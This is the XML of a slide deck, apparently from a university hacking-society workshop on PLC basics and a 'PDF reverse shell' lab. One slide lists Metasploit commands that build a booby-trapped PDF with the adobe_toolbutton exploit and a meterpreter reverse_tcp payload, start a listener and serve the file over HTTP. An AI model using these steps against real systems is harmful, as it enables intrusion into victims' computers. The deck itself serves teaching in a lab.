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9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2265" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="69" d="100"/>
          <a:sy n="69" d="100"/>
        </p:scale>
        <p:origin x="8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3EBAE-2337-CE4A-A94C-30DCB380E00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26346-57E3-CB41-A2F8-D563071F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87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67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97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3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76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7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0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92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31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39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3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1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5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6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94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64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7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4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20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6346-57E3-CB41-A2F8-D563071FA6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5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6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1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5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2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2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9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2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CBC2-7245-9C49-B52E-899385C2AAD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86D3A-52DB-D541-957A-9CF10E1F1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7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10.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.jpe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86" y="356009"/>
            <a:ext cx="4280428" cy="498889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16323" y="5606709"/>
            <a:ext cx="10959354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Krungthep" charset="-34"/>
                <a:ea typeface="Krungthep" charset="-34"/>
                <a:cs typeface="Krungthep" charset="-34"/>
              </a:rPr>
              <a:t>PLC Exploitation &amp; Reverse shell from pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Krungthep" charset="-34"/>
                <a:ea typeface="Krungthep" charset="-34"/>
                <a:cs typeface="Krungthep" charset="-34"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3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Krungthep" charset="-34"/>
                <a:ea typeface="Krungthep" charset="-34"/>
                <a:cs typeface="Krungthep" charset="-34"/>
              </a:rPr>
              <a:t>dmuhackers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Krungthep" charset="-34"/>
                <a:ea typeface="Krungthep" charset="-34"/>
                <a:cs typeface="Krungthep" charset="-34"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3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Krungthep" charset="-34"/>
                <a:ea typeface="Krungthep" charset="-34"/>
                <a:cs typeface="Krungthep" charset="-34"/>
              </a:rPr>
              <a:t>dmuhackers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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687" y="146312"/>
            <a:ext cx="588723" cy="58872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8" y="29319"/>
            <a:ext cx="801442" cy="78007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477789-FF50-417F-B9C9-FB5E5359E2C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8640417" y="1325217"/>
            <a:ext cx="259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File &gt; Import Appliance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>CSC\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>DMU_Hackers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ievm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990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Ok, but they’re air gapped right?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5D8979-8B98-4D04-8758-3A77759FE8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8" b="12412"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="428624" y="1302014"/>
            <a:ext cx="10450737" cy="43844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4927F-4245-412F-AA6F-C0BC3D04E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8" b="72717"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="428624" y="1302014"/>
            <a:ext cx="10450737" cy="8411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713142-6505-43F3-96D4-451665FB7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" t="27608" r="90520" b="64611"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="658416" y="5775124"/>
            <a:ext cx="1485900" cy="914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A90CA8-DD65-4B1C-BCA5-10536E5FD284}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="658416" y="2471738"/>
            <a:ext cx="0" cy="388917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3B6B7E-8D7D-49D1-928B-51118A3D3D31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1385578" y="2471738"/>
            <a:ext cx="758738" cy="376058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Meme Template Search - Imgflip">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DD385B3-29A0-4B4F-BDE2-17BEB30E4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649" y="2122239"/>
            <a:ext cx="5970192" cy="44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0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PDF Reverse shell – Todays hack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Image result for batman and robin batcomputer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3C4C388-430E-4121-B4A0-C04FA0350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43" y="1581398"/>
            <a:ext cx="6691313" cy="501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5D54E7F-DC91-451B-97AA-789B889F585E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4872036" y="1194074"/>
            <a:ext cx="2447926" cy="1404135"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -49834"/>
              <a:gd name="adj2" fmla="val 43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04B0FF8B-56C3-4DEA-A9FE-C3FDABDF07DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5424487" y="3829805"/>
            <a:ext cx="2447926" cy="1404135"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 48804"/>
              <a:gd name="adj2" fmla="val -69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137696-F990-4EA8-BC03-4DEA090CA0E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5000624" y="1419087"/>
            <a:ext cx="2190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Robin, write a batch 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08098-C256-4705-A48A-B41D430DD994}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5553075" y="4054818"/>
            <a:ext cx="2190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Sure thing batman! Btw, what's a        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1"/>
              <a:t>ch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t> script?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="233097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PDF Reverse shell – Run through</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6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1563541-98BB-4529-A492-C100FB6FB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994" y="1302014"/>
            <a:ext cx="760201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2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PDF Reverse shell – Run through</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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C4C7C7E2-8C38-4018-BC16-163934CBB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033"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2285467" y="2258350"/>
            <a:ext cx="7621064" cy="234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3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PDF Reverse shell – Run through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E98DCF-5790-4D5B-9B1C-47BD713A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14" y="1170781"/>
            <a:ext cx="9840698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76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PDF Reverse shell – Run through</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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2A018D7-DCEC-4842-A4ED-2A2AC76D9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8" r="9297"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="128583" y="1234973"/>
            <a:ext cx="11058525" cy="5493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47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PDF Reverse shell – Run through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D82728-BF25-46FA-9FC9-0465DA922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03"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="242894" y="1251475"/>
            <a:ext cx="10533530" cy="537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3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PDF Reverse shell – Run through</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6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EC729A9-110F-4E93-9F9A-174B19DF10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06"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066923" y="1391515"/>
            <a:ext cx="8058151" cy="537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3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PDF Reverse shell – Run through</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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B2710B2F-03CF-4CCD-9101-078709B674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149"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="368534" y="1222899"/>
            <a:ext cx="10101263" cy="537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1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PDF Reverse shell – Run through</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6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009091B3-7754-415E-9870-8D606F99F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75"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="504265" y="1302014"/>
            <a:ext cx="9829800" cy="537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4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Programmable Logic Controller (PLC)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A93315-FEFA-4715-9EB1-D41273810692}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2670048" y="2414016"/>
            <a:ext cx="6620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What are they?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32165-2E6B-4992-91BD-817D08B4B1F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2785871" y="4136598"/>
            <a:ext cx="6620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What do they do? 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75960-320B-4656-B2F4-02D2FC93FEBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2785871" y="3315079"/>
            <a:ext cx="6620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Where are they?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07C91-C8FC-47FC-A9E2-F8558FA2E1CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1510652">
            <a:off x="8173032" y="696805"/>
            <a:ext cx="293945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1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Bauhaus 93" panose="04030905020B02020C02" pitchFamily="82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F1E52-23B6-43C0-A0F7-97059E84B4C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20197618">
            <a:off x="707737" y="912639"/>
            <a:ext cx="293945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1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Bauhaus 93" panose="04030905020B02020C02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411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PDF Reverse shell – Lets Hack ;)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Image result for batman you can do it">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73B2054F-A7B9-4438-A64C-C8DE0042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25" y="283741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83F35-14A0-43D4-A21A-C7B854F0D2F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1281112"/>
            <a:ext cx="55979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Terminal 1:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msfconsole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Msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; use exploit/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fileformat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adobe_toolbutton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Msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; set filename &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>be_creative</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; set payload windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>meterpreter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reverse_tcp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Msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kali_vm_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 8080</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>your_document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;.pdf stored at &lt;directory&gt;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Msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; use exploit/multi/handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; set payload windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>meterpreter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reverse_tcp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Msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kali_vm_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 8080</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; run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0A593-022C-40F8-B1E1-28719FA9E019}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5778958" y="1302014"/>
            <a:ext cx="5597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Terminal 2:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mkdir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webfiles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root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:~# cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>webfiles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 err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:~#  mv &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>your_pdf_location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; /root/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>webfiles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  <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:~#  ls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>your_document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:~#  python3 –m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http.server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 80</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14122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" y="877107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579" y="1494625"/>
            <a:ext cx="10600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“an industrial digital computer which has been ruggedized and adapted for the control of manufacturing processes”*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E7B1-7259-447E-A183-7BF4ED456BAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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What are they?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="6ES7211-1BE40-0XB0 | Siemens S7-1200 PLC CPU, Ethernet ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{411431EE-14BB-4014-A73A-6FC41EEE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2448732"/>
            <a:ext cx="34671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8712B9-7F2D-4449-803C-537D88FFA012}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1171575" y="6343650"/>
            <a:ext cx="752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*https://en.wikipedia.org/wiki/Programmable_logic_controller</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="793380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" y="877107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0E7B1-7259-447E-A183-7BF4ED456BAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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Where are they?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="https://www.schneider-electric.co.uk/en/Images/42-24503462-2560x1748.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37B8AB86-E0AC-47A2-A3AA-9829534AB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46" y="1494671"/>
            <a:ext cx="6367175" cy="4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schneider-electric.co.uk/en/Images/42-24503462-2560x1748.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BDAC66A-AB49-47C5-87ED-5B32025D8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0" t="8663" r="14382" b="75625"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7415211" y="1494671"/>
            <a:ext cx="1128714" cy="107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C1F3D9-1FFC-4D2F-B72D-590CAEF098CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5500688" y="1494671"/>
            <a:ext cx="1914523" cy="4770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3A2A19-AADB-4867-951D-2985A50FA95F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7415211" y="2572181"/>
            <a:ext cx="11287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DE3B8B-9B22-4A18-A7FE-37D12D962072}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7415211" y="1494671"/>
            <a:ext cx="11287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1816FA-8100-49C5-A32A-50B7E7419AC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8543925" y="1494671"/>
            <a:ext cx="0" cy="10775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24482B-8264-4A3A-9101-D556C4381186}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7396161" y="1480222"/>
            <a:ext cx="0" cy="10775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plc in a factory">
            <a:extLst>
